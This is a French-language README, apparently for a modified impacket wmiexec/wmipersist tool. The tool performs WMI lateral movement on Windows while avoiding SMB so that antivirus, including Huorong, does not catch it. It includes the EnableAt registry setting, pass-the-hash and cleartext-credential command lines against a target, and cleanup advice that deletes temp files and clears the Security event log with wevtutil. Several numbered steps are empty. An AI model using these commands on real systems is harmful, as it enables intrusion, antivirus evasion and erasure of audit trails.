
Version modifiée de impacket wmiexec.py, obtient la sortie (données, réponse) depuis le registre, ne nécessite pas de connexion SMB, contourne également les antivirus lors des mouvements latéraux à la manière de WMIHACKER.
Version modifiée de wmiexec.py et wmipersist.py d'impacket. Récupère la sortie (données, réponse) depuis le registre, pas besoin de connexion SMB, mais je suis dans du mauvais code :(
Dans le wmiexec.py original, il récupère la réponse via la connexion SMB (ports 445,139). Malheureusement, certains antivirus surveillent ces ports comme étant à haut risque.
Dans ce cas, j'ai supprimé la fonction de connexion SMB et j'utilise d'autres méthodes pour exécuter des commandes.
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration
Name: EnableAt
Type: REG_DWORD
Value: 1
wmipersist-wip.py (Hautement recommandé, fonctionne uniquement avec impacket v0.9.24!!!) : Une version Python de WMIHACKER, dont j'ai extrait le modèle VBS. Un attaquant peut l'utiliser pour effectuer un mouvement latéral en toute sécurité sous un antivirus en cours d'exécution.
wmiexec-regOut.py : Juste un exemple simple de la méthode Win32_Process.create.
Étape 1 :
Étape 2 :
Étape 3 :
Étape 4 :
Étape 5 :
Étape 1 :
Étape 2 :
Étape 3 :
Généralement, il suffit d'installer l'impacket officiel.
Avec mot de passe en clair
python3 wmiexec-reg.py administrator:[email protected] 'whoami'

Avec hashs NTLM
python3 wmiexec-reg.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'

Avec mot de passe en clair (sans sortie)
python3 wmipersist-wip.py administrator:[email protected] 'command'

Avec hashs NTLM
python3 wmipersist-wip.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'
N'oubliez pas de nettoyer le répertoire temporaire après avoir exécuté une commande avec sortie.
Commande : del /q /f /s C:\windows\temp\*

La commande inclut des guillemets doubles.
Mettez les guillemets doubles à l'intérieur de guillemets simples wevtutil cl '"security"'


Avec sortie
python3 wmipersist-wip.py administrator:[email protected] "whoami /priv" -with-output
python3 wmipersist-wip.py [email protected] "whoami /priv" -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 -with-output

Sous l'antivirus Huorong (Utilisation du modèle VBS de WMIHACKER!!!)
